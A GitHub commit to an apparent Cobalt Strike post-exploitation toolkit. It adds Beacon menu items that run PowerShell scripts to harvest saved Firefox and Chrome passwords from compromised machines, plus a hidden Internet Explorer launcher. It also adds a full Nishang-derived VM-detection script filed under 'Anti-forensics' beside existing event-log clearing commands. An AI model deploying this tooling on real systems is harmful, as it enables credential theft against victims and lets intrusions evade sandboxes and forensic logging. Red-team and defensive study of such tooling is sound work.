fixed gitattribtes, added some postExploit

Und3rf10w · May 24, 2016 · dffc4c3 · dffc4c3
1 parent b5c8b35
commit dffc4c3
Show file tree

Hide file tree

Showing 6 changed files with 1,520 additions and 3 deletions.
diff --git a/.gitattributes b/.gitattributes
@@ -2,6 +2,6 @@
 * text=auto
 
 # Explicit file delcarations to make sure nothing breaks
-* .sh text eol=lf
-* .ps1 text eol=crlf
-* .cna text eol=lf
+*.sh text eol=lf
+*.ps1 text eol=crlf
+*.cna text eol=lf
diff --git a/postExploit/postExploit.cna b/postExploit/postExploit.cna
@@ -11,6 +11,26 @@ popup beacon_bottom{
 				}
 			}
 		}
+		menu "Get Credentials"{
+			item "Get Firefox Passwords"{
+				local('$bid');
+				foreach $bid ($1){
+					binput($1, powershell-import Get-FirefoxPasswords.ps1)
+					bpowershell_import($1, script_resource("scripts/Get-FirefoxPasswords.ps1"));
+					binput($1, "powershell Get-FirefoxPasswords");
+					bpowershell($1, "Get-FirefoxPasswords");
+				}
+			}
+			item "Get Chrome Passwords"{
+				local('$bid');
+				foreach $bid ($1){
+					binput($1, powershell-import Get-ChromePasswords.ps1)
+					bpowershell_import($1, script_resource("scripts/Get-ChromePasswords.ps1"));
+					binput($1, "powershell Get-ChromePasswords");
+					bpowershell($1, "Get-ChromePasswords");
+				}
+			}
+		}
 		menu "Anti-forensics" {
 			item "Clear System Event Logs (psh)"{
 				local('$bid');
@@ -26,8 +46,30 @@ popup beacon_bottom{
 					bshell($1, "sc stop wecsvc");
 				}
 			}
+			item "Check VM" {
+				local('$bid');
+				foreach $bid ($1){
+					binput($1, powershell-import Check-VM.ps1)
+					bpowershell_import($1, script_resource("scripts/Check-VM.ps1"));
+					binput($1, "powershell Check-VM");
+					bpowershell($1, "Check-VM");
+				}
+			}
 		}
 		menu "Annoy" {
+			item "Open Hidden Internet Explorer" {
+				local('$bid');
+				foreach $bid ($1){
+					binput($1, powershell-import Open-HiddenInternetExplorer.ps1)
+					bpowershell_import($1, script_resource("scripts/Open-HiddenInternetExplorer.ps1"));
+					prompt_text("URL to open?", "https://www.youtube.com/watch?v=wZZ7oFKsKzY", {
+						$videoURL = $1;
+						return $videoURL;
+					});
+					binput($1, "powershell Open-HiddenInternetExplorer $videoURL ");
+					bpowershell($1, "Open-HiddenInternetExplorer $videoURL ");
+				}
+			}
 			# Credit goes to SadProcessor for these scripts!
 			menu "Play chiptunes" {
 				item "Play Imperial March" {

diff --git a/postExploit/scripts/Check-VM.ps1 b/postExploit/scripts/Check-VM.ps1
@@ -0,0 +1,304 @@
+# Taken from Nishang (https://github.com/samratashok/nishang)
+# Checks if host is a virtual machine
+# @Und3rf10w
+
+function Check-VM
+{
+
+<# 
+.SYNOPSIS 
+Nishang script which detects whether it is in a known virtual machine.
+ 
+.DESCRIPTION 
+This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
+Xen and QEMU for detecting the environment.
+
+.EXAMPLE 
+PS > Check-VM
+ 
+.LINK 
+http://www.labofapenetrationtester.com/2013/01/quick-post-check-if-your-payload-is.html
+https://github.com/samratashok/nishang
+
+.NOTES 
+The script draws heavily from checkvm.rb post module from msf.
+https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
+#> 
+    [CmdletBinding()] Param()
+    $ErrorActionPreference = "SilentlyContinue"
+    #Hyper-V
+    $hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
+    if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
+        {
+            $hypervm = $true
+        }
+
+    if (!$hypervm)
+        {
+            $hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
+            if ($hyperv -match "vrtual")
+                {
+                    $hypervm = $true
+                }
+        }
+
+    if (!$hypervm)
+        {
+            $hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
+            if ($hyperv -match "vrtual")
+                {
+                    $hypervm = $true
+                }
+        }
+
+    if (!$hypervm)
+        {
+            $hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
+            if ($hyperv -match "vrtual")
+                {
+                    $hypervm = $true
+                }
+        }
+
+    if (!$hypervm)
+        {
+            $hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+            if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
+                {
+                    $hypervm = $true
+                }
+        }
+
+    if ($hypervm)
+        {
+
+             "This is a Hyper-V machine."
+
+        }
+
+    #VMWARE
+
+    $vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+    if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
+        {
+            $vmwarevm = $true
+        }
+
+    if (!$vmwarevm)
+        {
+            $vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
+            if ($vmware -match "vmware")
+                {
+                    $vmwarevm = $true
+                }
+        }
+
+    if (!$vmwarevm)
+        {
+            $vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
+            if ($vmware -match "vmware")
+                {
+                    $vmwarevm = $true
+                }
+        }
+
+    if (!$vmwarevm)
+        {
+            $vmware = Get-Process
+            if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
+                {
+                    $vmwarevm = $true
+                }
+        }
+
+    if ($vmwarevm)
+        {
+
+             "This is a VMWare machine."
+
+        }
+
+    #Virtual PC
+
+    $vpc = Get-Process
+    if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
+        {
+        $vpcvm = $true
+        }
+
+    if (!$vpcvm)
+        {
+            $vpc = Get-Process
+            if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
+                {
+                    $vpcvm = $true
+                }
+        }
+
+    if (!$vpcvm)
+        {
+            $vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+            if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
+                {
+                    $vpcvm = $true
+                }
+        }
+
+    if ($vpcvm)
+        {
+
+         "This is a Virtual PC."
+
+        }
+
+
+    #Virtual Box
+
+    $vb = Get-Process
+    if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
+        {
+
+        $vbvm = $true
+
+        }
+    if (!$vbvm)
+        {
+            $vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
+            if ($vb -match "vbox_")
+                {
+                    $vbvm = $true
+                }
+        }
+
+    if (!$vbvm)
+        {
+            $vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
+            if ($vb -match "vbox_")
+                {
+                    $vbvm = $true
+                }
+        }
+
+
+    if (!$vbvm)
+        {
+            $vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
+            if ($vb -match "vbox")
+                {
+                    $vbvm = $true
+                }
+        }
+
+
+
+    if (!$vbvm)
+        {
+            $vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
+            if ($vb -match "vbox")
+                {
+                     $vbvm = $true
+                }
+        }
+
+
+    if (!$vbvm)
+        {
+            $vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+            if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
+                {
+                    $vbvm = $true
+                }
+        }
+
+    if ($vbvm)
+        {
+
+         "This is a Virtual Box."
+
+        }
+
+
+
+    #Xen
+
+    $xen = Get-Process
+
+    if ($xen -eq "xenservice.exe")
+        {
+
+        $xenvm = $true
+
+        }
+
+    if (!$xenvm)
+        {
+            $xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
+            if ($xen -match "xen")
+                {
+                    $xenvm = $true
+                }
+        }
+
+    if (!$xenvm)
+        {
+            $xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
+            if ($xen -match "xen")
+                {
+                    $xenvm = $true
+                }
+        }
+
+    if (!$xenvm)
+        {
+            $xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
+            if ($xen -match "xen")
+                {
+                    $xenvm = $true
+                }
+        }
+
+
+    if (!$xenvm)
+        {
+           $xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
+            if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
+                {
+                    $xenvm = $true
+                }
+        }
+
+
+    if ($xenvm)
+        {
+
+         "This is a Xen Machine."
+
+        }
+
+
+    #QEMU
+
+    $qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
+    if ($qemu -match "qemu")
+        {
+
+            $qemuvm = $true
+
+        }
+
+    if (!$qemuvm)
+        {
+        $qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
+        if ($qemu -match "qemu")
+            {
+                $qemuvm = $true
+            }
+        }    
+
+    if ($qemuvm)
+        {
+
+         "This is a Qemu machine."
+
+        }
+}